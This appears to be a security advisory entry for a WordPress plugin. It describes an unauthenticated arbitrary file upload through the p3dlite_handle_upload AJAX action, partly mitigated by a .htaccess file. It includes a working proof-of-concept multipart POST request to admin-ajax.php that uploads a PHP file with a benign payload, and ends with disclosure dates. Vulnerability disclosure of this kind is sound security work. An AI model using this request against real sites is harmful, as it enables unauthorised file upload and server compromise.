The p3dlite_handle_upload AJAX action of the plugin does not have any authorisation and does not check the uploaded file, allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353 Content-Length: 366 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------54331109111293931601238262353 Content-Disposition: form-data; name="action" p3dlite_handle_upload -----------------------------54331109111293931601238262353 Content-Disposition: form-data; name="file"; filename="a.php" Content-Type: text/php <?php echo 'Failed'; ?> -----------------------------54331109111293931601238262353--
UPLOAD
2021-09-23 (about 1 years ago)
2021-09-23 (about 1 years ago)
2022-04-09 (about 9 months ago)